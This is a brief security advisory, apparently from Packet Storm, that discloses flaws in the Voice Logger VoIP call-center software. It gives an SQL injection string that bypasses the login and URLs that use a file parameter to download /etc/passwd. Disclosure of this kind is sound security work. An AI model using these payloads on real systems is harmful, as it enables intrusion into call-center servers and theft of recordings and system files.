Voice Logger suffers from a remote SQL injection vulnerability that allows for authentication bypass as well as an arbitrary file download vulnerability.
6dd5934f028b093d5d8bd5693b5f0b0569da00f3dbba65651175bba34bfcf673Author: Michal Blaszczak
Website: http://blaszczakm.blogspot.com
Project: hack voip - http://blaszczakm.blogspot.com/search/label/hack%20voip
Date: 16.07.2013
Voice Logger - VoIP software for Call Center
1) bypass login
login: admin' or 1='1
password: admin
line: 168 file: manager_login.server.php
2) arbitrary file download
http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
linie: 2 file:records.php
http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
linie: 2 file:records.php
3) and other security bugs
Michał Błaszczak
http://blaszczakm.blogspot.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed